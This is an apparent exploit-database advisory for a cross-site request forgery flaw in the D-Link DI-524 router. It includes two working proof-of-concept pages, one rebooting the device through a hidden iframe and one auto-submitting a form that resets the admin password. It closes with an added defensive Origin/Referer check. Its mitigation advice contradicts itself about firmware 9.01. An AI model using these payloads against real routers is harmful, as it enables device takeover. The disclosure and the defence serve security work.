Vendor: D-Link DI-524 Wireless 150
By: Felipe Soares de Souza
CVSS: 7.5 (HIGH)
Type: Cross-Site-Request-Forgery
CWE: 352
Product Name: D-Link DI-524 Wireless 150
Affected Version From: Firmware 9.01
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: h:d-link:di-524
Metasploit:
Other Scripts:
Platforms Tested:
2016

D-Link DI-524 – Cross-Site-Request-Forgery Vulnerability

This vulnerability allows an attacker to perform unauthorized actions on the D-Link DI-524 Wireless 150 router through cross-site request forgery. The proof of concept consists of two parts: one to reboot the device and another to change the admin account. The first part loads the reboot URL of the router's web interface in a 1x1 iframe, while the second part auto-submits a form that changes the admin account credentials without the user's consent.

Mitigation:

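To mitigate this vulnerability, users should ensure they are running the latest firmware version (9.01) provided by D-Link. It is also recommended to change the default admin credentials and regularly monitor the router's logs for any suspicious activity. This page lists firmware 9.01 as the affected version and reports that no patch exists, so running that version does not by itself remove the exposure.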

Exploit-DB raw data:

Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
Credit: Felipe Soares de Souza
Date: 09/12/2016
Vendor: D-Link
Product: D-Link DI-524 Wireless 150
Product link: https://dlink.com.br/produto/di-524150
Version: Firmware 9.01


1- Reboot the device
	<html>
		<head>
			<title>CSRF - Reboot the device</title>
		</head>
		<body>
			<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
		</body>
	</html>


2- Change admin account

	<html>
		<head>
			<title>CSRF - Change admin account</title>
		</head>
		<body>
			<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
				<input type="hidden" name="rc" value="@atbox">
				<input type="hidden" name="Pa" value="attacker">
				<input type="hidden" name="p1" value="attacker">
			</form>

			<script type="text/javascript">
				document.forms[0].submit();
			</script>
		</body>
	</html>
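
As an added example (not part of the original advisory and not D-Link firmware code), the check below shows the server-side validation that both requests above would fail: on state-changing paths, compare Origin (or Referer when Origin is absent) against Host, regardless of HTTP method. The function names, the request shape and the `other-site.example` values are assumptions constructed for illustration.

```javascript
// Added example, not D-Link firmware code; all names here are hypothetical.
// State-changing paths taken from the two requests on this page.
const STATE_CHANGING_PATHS = new Set(["/cgi-bin/dial", "/cgi-bin/pass"]);

// Host[:port] of an Origin/Referer value, or null if missing or unparsable.
function sourceHost(value) {
  if (!value || value === "null") return null;
  try {
    return new URL(value).host.toLowerCase();
  } catch {
    return null;
  }
}

// req = { method, url, headers } with lower-case header names (assumed shape).
function checkRequest(req) {
  const path = req.url.split("?")[0];
  // Method is deliberately ignored: the reboot request is a plain GET.
  if (!STATE_CHANGING_PATHS.has(path)) {
    return { allow: true, reason: "not state-changing" };
  }
  const host = (req.headers["host"] || "").toLowerCase();
  // Use Origin when the browser sent it; otherwise fall back to Referer,
  // which a framed GET navigation normally carries.
  const raw = req.headers["origin"] !== undefined
    ? req.headers["origin"] : req.headers["referer"];
  const source = sourceHost(raw);
  if (!source) return { allow: false, reason: "no usable Origin or Referer" };
  if (source !== host) return { allow: false, reason: `cross-site request from ${source}` };
  return { allow: true, reason: "same-origin" };
}

// Constructed sample requests; the first two mirror the ones on this page.
const SAMPLES = [
  { method: "GET", url: "/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status",
    headers: { host: "192.168.0.1", referer: "http://other-site.example/page.html" } },
  { method: "POST", url: "/cgi-bin/pass",
    headers: { host: "192.168.1.1", origin: "http://other-site.example" } },
  { method: "POST", url: "/cgi-bin/pass",
    headers: { host: "192.168.1.1", origin: "http://192.168.1.1", referer: "http://192.168.1.1/" } },
  { method: "GET", url: "/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status",
    headers: { host: "192.168.0.1" } },
];
for (const r of SAMPLES) console.log(r.method, r.url.split("?")[0], checkRequest(r));
```

Rejecting requests that carry neither header is the strict choice; it blocks clients that strip Referer, which is the trade-off for covering the GET-triggered reboot.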